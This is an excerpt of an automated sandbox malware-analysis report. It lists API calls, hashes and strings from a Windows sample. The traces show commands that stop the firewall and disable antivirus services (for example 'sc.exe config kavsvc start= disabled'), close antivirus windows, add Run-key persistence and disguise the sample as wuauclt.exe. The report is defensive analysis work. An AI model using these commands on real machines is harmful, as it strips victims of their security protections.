                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                            • String ID:
                                                                            • API String ID: 2659516521-0
                                                                            • Opcode ID: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction ID: 5eb690258a486c73d36cab68f814cc2b6737afb4a969db669cbaf41a67b5cd0e
                                                                            • Opcode Fuzzy Hash: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction Fuzzy Hash: F0F0A4B5D0520C66CB10EAE68D859CF73AC5F45314F5006F7B615F21D1E738DB444754
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004047CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction ID: c40cfb2cff0e8543d494dcdfcbf93d461de1da01fd97da5991265f8cc755c822
                                                                            • Opcode Fuzzy Hash: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction Fuzzy Hash: EFC012A261122017CA1066F52C844C3579CC9891FA31404B3B704E7141E2398C105294
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7177dfe09ef4ef988a2f4ce694f4589d817de3211fee15f6d50f853410cb63ed
                                                                            • Instruction ID: 9b54f791db319941aeffdd1efb0013a4bd3e1cb590ed9f6d5a4233f3242aa329
                                                                            • Opcode Fuzzy Hash: 7177dfe09ef4ef988a2f4ce694f4589d817de3211fee15f6d50f853410cb63ed
                                                                            • Instruction Fuzzy Hash: 088181346001598BCB10EF29CD899DEB7F5AF84308F10C1FAA048F7292DE74AE458F48
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1fa593c62158223b1756ff7cb23789419df856db7ac206db492079f68264a68
                                                                            • Instruction ID: 1bade6449aabee190caab60189d6dc675293c1afc907f810e7c367bfa3899723
                                                                            • Opcode Fuzzy Hash: d1fa593c62158223b1756ff7cb23789419df856db7ac206db492079f68264a68
                                                                            • Instruction Fuzzy Hash: 65F0B2254C06808ACA2FFF72850231C62319F6C708F04682FF3854A532DA2F4425855B

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(0000012C,00000000,0040775D,?,00000003,00000000,00000000), ref: 004073A8
                                                                            • ShellExecuteA.SHELL32(00000000,open,regedit.exe,00000000,noruns.reg,?), ref: 004073E8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop sharedaccess,00000000,00000000), ref: 00407402
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVWSC,00000000,00000000), ref: 0040741C
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVWSC start= disabled,00000000,00000000), ref: 00407436
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVSrvXP,00000000,00000000), ref: 00407450
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVSrvXP start= disabled,00000000,00000000), ref: 0040746A
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop kavsvc,00000000,00000000), ref: 00407484
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config kavsvc start= disabled,00000000,00000000), ref: 0040749E
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsRavMon start= disabled,00000000,00000000), ref: 004074B8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsCCenter,00000000,00000000), ref: 004074D2
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000), ref: 004074EC
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsRavMon,00000000,00000000), ref: 00407506
                                                                            • Sleep.KERNEL32(00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000,open,net.exe), ref: 00407510
                                                                            • FindWindowA.USER32(#32770,00407944), ref: 0040751F
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00407958), ref: 00407531
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00407544
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000), ref: 00407681
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled), ref: 004076D8
                                                                            • Sleep.KERNEL32(00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 004076E4
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 00407709
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShell$FileSleep$AttributesFindWindow$CloseDeleteDirectoryMessageSendValueWindows
                                                                            • String ID: /s $"NoDriveTypeAutoRun"=dword:bd$#32770$Button$CCenter.exe$EGHOST.exe$KVCenter.kxp$KVMonXP.exe$KVSrvXp_1.exe$Kav.exe$KavPFW.exe$KpopMon.exe$Kvsrvxp.exe$Microsoft$Nvsvc32.exe$PFW.exe$RAVMON.exe$RAVTIMER.exe$REGEDIT4$RRfwMain.exe$RavMonD.exe$RavService.exe$RfwMain.exe$Rtvscan.exe$Software\Microsoft\Windows\CurrentVersion\Run$VPTray.exe$[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]$config KVSrvXP start= disabled$config KVWSC start= disabled$config RsCCenter start= disabled$config RsRavMon start= disabled$config kavsvc start= disabled$kav32.exe$kavstart.exe$kavsvc.exe$kvwsc.exe$net.exe$net.exe$net1.exe$noruns.reg$open$regedit.exe$regedit.exe$sc.exe$sc.exe$sc1.exe$stop KVSrvXP$stop KVWSC$stop RsCCenter$stop RsRavMon$stop kavsvc$stop sharedaccess$wuauclt.exe
                                                                            • API String ID: 4147674485-668396500
                                                                            • Opcode ID: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction ID: ad58a2a6b321d20f2a5f7c4230813dddbb1cdd15f012d9e1a88ffbed65f06cfb
                                                                            • Opcode Fuzzy Hash: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction Fuzzy Hash: A6A10DB5F8828526D700B7A68C47F5E75649B84B09F20C47BB7147A2C3CABCB944867F

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 154 406f74-406fa9 GetDesktopWindow 155 406fab-406fdf FindWindowExA GetWindowTextA call 403b3c call 403e2c 154->155 160 406fe1-406fe8 PostMessageA 155->160 161 406fed-406fef 155->161 160->161 161->155 162 406ff1-406ff6 GetDesktopWindow 161->162 163 406ff8-40702c FindWindowExA GetWindowTextA call 403b3c call 403e2c 162->163 168 40703a-40703c 163->168 169 40702e-407035 PostMessageA 163->169 168->163 170 40703e-407043 GetDesktopWindow 168->170 169->168 171 407045-407079 FindWindowExA GetWindowTextA call 403b3c call 403e2c 170->171 176 407087-407089 171->176 177 40707b-407082 PostMessageA 171->177 176->171 178 40708b-407090 GetDesktopWindow 176->178 177->176 179 407092-4070c6 FindWindowExA GetWindowTextA call 403b3c call 403e2c 178->179 184 4070d4-4070d6 179->184 185 4070c8-4070cf PostMessageA 179->185 184->179 186 4070d8-4070dd GetDesktopWindow 184->186 185->184 187 4070df-407113 FindWindowExA GetWindowTextA call 403b3c call 403e2c 186->187 192 407121-407123 187->192 193 407115-40711c PostMessageA 187->193 192->187 194 407125-40712a GetDesktopWindow 192->194 193->192 195 40712c-407160 FindWindowExA GetWindowTextA call 403b3c call 403e2c 194->195 200 407162-407169 PostMessageA 195->200 201 40716e-407170 195->201 200->201 201->195 202 407172-407180 FindWindowA 201->202 203 407182-407195 FindWindowA PostMessageA 202->203 204 40719a-4071a8 FindWindowA 202->204 203->204 205 4071c2-4071d3 FindWindowA 204->205 206 4071aa-4071bd FindWindowA PostMessageA 204->206 207 4071f0-40720a call 4039f4 205->207 208 4071d5-4071eb FindWindowA PostMessageA 205->208 206->205 208->207
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00406FA4
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FB1
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00406FBC
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00406FE8
                                                                            • GetDesktopWindow.USER32 ref: 00406FF1
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FFE
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407009
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407035
                                                                            • GetDesktopWindow.USER32 ref: 0040703E
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 0040704B
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407056
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407082
                                                                            • GetDesktopWindow.USER32 ref: 0040708B
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407098
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070A3
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 004070CF
                                                                            • GetDesktopWindow.USER32 ref: 004070D8
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 004070E5
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070F0
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040711C
                                                                            • GetDesktopWindow.USER32 ref: 00407125
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407132
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 0040713D
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407169
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 00407179
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 0040718F
                                                                            • PostMessageA.USER32(00000000,TKillqqvir,00000000,00000012), ref: 00407195
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071A1
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071B7
                                                                            • PostMessageA.USER32(00000000,TKqqviru,00000000,00000012), ref: 004071BD
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071CC
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071E5
                                                                            • PostMessageA.USER32(00000000,TApplication,qqav,00000012), ref: 004071EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessagePost$DesktopText
                                                                            • String ID: QQAV$QQKav$TApplication$TKillqqvir$TKqqviru$qqav
                                                                            • API String ID: 2345741875-3628034782
                                                                            • Opcode ID: 2752b8e2637b6a2b4cba271e1026fffa52fd9ce12dfe85074699589a26517922
                                                                            • Instruction ID: f35ba248066b91e113d1cf3b3e48b889a6c1fe840748cfa81e74fa6914067d70
                                                                            • Opcode Fuzzy Hash: 2752b8e2637b6a2b4cba271e1026fffa52fd9ce12dfe85074699589a26517922
                                                                            • Instruction Fuzzy Hash: 7C610DB0B8434466E620B6B24D83F5E656D9F94B08F20617FBF00BA2C3D9BCAD11456D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: 7fa1bdf61dc4ff95cf5125529cc28d12645d26f519da0778e5b22792c792acde
                                                                            • Instruction ID: 6a7de7b5178300d5e0790259bd21792f98359187be932f6565a32f3e00f96a55
                                                                            • Opcode Fuzzy Hash: 7fa1bdf61dc4ff95cf5125529cc28d12645d26f519da0778e5b22792c792acde
                                                                            • Instruction Fuzzy Hash: 175143B07442056BD700F7A69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: b5cc6f4e8601f6bcbfd67292a8b471391b2f86e951d761d7ea2a1644390cc92a
                                                                            • Instruction ID: 3c3994bb7e487e018b31e22462f638a3ed2aa8583c797724152dc9debaa7126f
                                                                            • Opcode Fuzzy Hash: b5cc6f4e8601f6bcbfd67292a8b471391b2f86e951d761d7ea2a1644390cc92a
                                                                            • Instruction Fuzzy Hash: BA5141B07442056BD700FBA69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C06
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C1F
                                                                            • PostMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C25
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C3A
                                                                            • SendMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C40
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C68
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C94
                                                                            • DeleteFileA.KERNEL32(00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408CC3
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00408CF5
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408D6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: File$FindWindow$Message$AttributesCopyDeleteDirectoryExecuteModuleNamePostSendShellWindows
                                                                            • String ID: bbyb$open$wuauclt.exe
                                                                            • API String ID: 2051752798-429206649
                                                                            • Opcode ID: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction ID: e6955b423cf41d5715ab26280c9398332a00561a3d493f58480fbd492c7ff700
                                                                            • Opcode Fuzzy Hash: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction Fuzzy Hash: 784130706502059BD740FBA6C943F8E7AB99F98709F10413BB640B75D2CE7CA900866D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
